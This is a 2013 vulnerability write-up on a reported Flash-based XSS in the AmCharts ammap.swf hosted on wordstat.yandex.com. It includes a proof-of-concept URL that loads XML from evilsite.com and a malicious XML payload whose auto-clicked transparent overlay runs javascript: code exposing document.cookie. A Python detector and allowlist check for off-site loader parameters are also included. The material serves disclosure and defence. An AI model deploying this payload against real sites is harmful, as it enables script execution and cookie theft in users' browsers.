Flash-based XSS in Yandex's AmCharts component

June 29, 2013

Here I present a (reported) Flash-based XSS vulnerability I discovered in wordstat.yandex.com, requiring no user interaction.

I think it is particularly interesting for several reasons.

It exploits the fact that the ammap.swf file, which is part of AmCharts, loads external resources from attacker-supplied URLs, which allows for content spoofing and, ultimately, arbitrary JavaScript execution in the context of the hosting domain (in this case, wordstat.yandex.com).

By disassembling the SWF, we discover that the data_file and settings_file parameters are user controllable and injectable directly in the URL.

[Figures: Disassembling the SWF (1) and (2)]

Here is a link to a proof of concept:

http://wordstat.yandex.com/flash/ammap/ammap.swf?path=&data_file=http://evilsite.com/ammap_data.xml&settings_file=http://evilsite.com/ammap_settings.xml&.swf
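The two URL parameters above are what make the issue exploitable from a plain link, so a site operator who cannot immediately remove or upgrade the SWF would want two things: a way to spot requests whose loader parameters point off-site, and an allowlist check to apply before such values ever reach the component. The following is an added example written for this post, not code from AmCharts, Yandex or the original author; it assumes only the parameter names shown in the PoC (data_file, settings_file, path), and the sample request URLs are constructed for the demonstration.

```python
"""Detect and block off-site loader parameters for an AmCharts-style SWF.

Added example, not part of the original write-up. Assumes the parameter
names data_file / settings_file / path seen in the proof-of-concept URL.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the post shows to be attacker-controllable through the URL.
LOADER_PARAMS = ("data_file", "settings_file", "path")

# Constructed sample requests (the second one mirrors the PoC in the post).
SAMPLE_REQUESTS = [
    "http://wordstat.yandex.com/flash/ammap/ammap.swf?path=&data_file=ammap_data.xml"
    "&settings_file=ammap_settings.xml",
    "http://wordstat.yandex.com/flash/ammap/ammap.swf?path=&data_file=http://evilsite.com/ammap_data.xml"
    "&settings_file=http://evilsite.com/ammap_settings.xml&.swf",
    "http://wordstat.yandex.com/flash/ammap/ammap.swf?data_file=//evilsite.com/x.xml",
    "http://wordstat.yandex.com/flash/ammap/ammap.swf?data_file=http://wordstat.yandex.com/flash/ammap/data.xml",
]


def external_loader_params(request_url):
    """Return {param: value} for loader parameters that resolve off-origin.

    A value is flagged when it carries a host different from the request's
    own host (absolute or scheme-relative URL) or uses a non-http(s) scheme.
    Relative file names and same-host absolute URLs are not flagged.
    """
    req = urlsplit(request_url)
    findings = {}
    for name, values in parse_qs(req.query, keep_blank_values=True).items():
        if name not in LOADER_PARAMS:
            continue
        for raw in values:
            value = unquote(raw).strip()
            if not value:
                continue
            target = urlsplit(value)
            if target.netloc and target.netloc.lower() != req.netloc.lower():
                findings[name] = value
            elif target.scheme and target.scheme.lower() not in ("http", "https"):
                findings[name] = value
    return findings


def audit(request_urls):
    """Run the detector over a batch of request URLs (e.g. from access logs)."""
    return [(url, hits) for url in request_urls if (hits := external_loader_params(url))]


def validate_loader_value(value, allowed_prefix="/flash/ammap/"):
    """Allowlist check for the hardened side.

    Accepts only a bare file name of the form name.xml (no scheme, no host,
    no directory separators, no traversal) and maps it under a fixed
    directory. Returns the normalised path, or None if the value is rejected.
    The prefix is an assumption for the example, not a known deployment path.
    """
    value = unquote(value).strip()
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.xml", value):
        return None
    return allowed_prefix + value


if __name__ == "__main__":
    for url, hits in audit(SAMPLE_REQUESTS):
        print("off-site loader parameter(s):", hits, "in", url)
    for candidate in ("ammap_data.xml", "http://evilsite.com/ammap_data.xml", "../../x.xml"):
        print(repr(candidate), "->", validate_loader_value(candidate))
```

The detector is a stop-gap for log review or a WAF rule: the root cause lives inside the SWF, so the durable fix is to remove or update the component. The allowlist check shows the shape that fix should take at whatever layer reads these parameters: accept a file name from a fixed set or pattern and build the path yourself, rather than trying to blocklist "bad" URLs.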

We control the “map” by providing two XML files, hosted on an external server.

The file ammap_settings.xml just sets a white background and disables controls such as the zoom arrows, the legend, the small map, etc.

The file ammap_data.xml is the interesting one. Here is the malicious payload:

<?xml version="1.0" encoding="UTF-8"?>
<map map_file="http://appsec.ws/ExploitDB/Configs/amMap/people.swf" zoom="100%" url="#xss">
    <movies>
    <movie file="rectangle" oid="xss" x="0" y="0" width="100%" height="100%" color="#FFFFFF"
    alpha="0" url="javascript:alert('XSS by Miki (//miki.it)\ndocument.domain = ' +
    document.domain + '\ndocument.cookie = ' + document.cookie + '\nlocation.href = ' +
    location.href)">
    </movie>
    </movies>
</map>

As you can see, an external SWF is loaded as the map, and a rectangular area (called a movie, file="rectangle") is defined that covers the whole screen and is fully transparent (alpha="0").

The area, if clicked, triggers the execution of a simple JavaScript function, in this case an alert box that displays document.domain, document.cookie and location.href.

In order to make it work without user interaction, we add an object id (oid) to the movie with the oid="xss" attribute, and simulate a click on the movie with the url="#xss" attribute of the <map> tag, as documented in the AmCharts documentation (no longer online):

Attribute | Type       | Meaning
url       | #object_id | ID of the object which should be “clicked” when the map initializes

This leads to arbitrary JS execution in the context of wordstat.yandex.com without any user interaction:

[Figure: JavaScript executed by just opening a URL.]
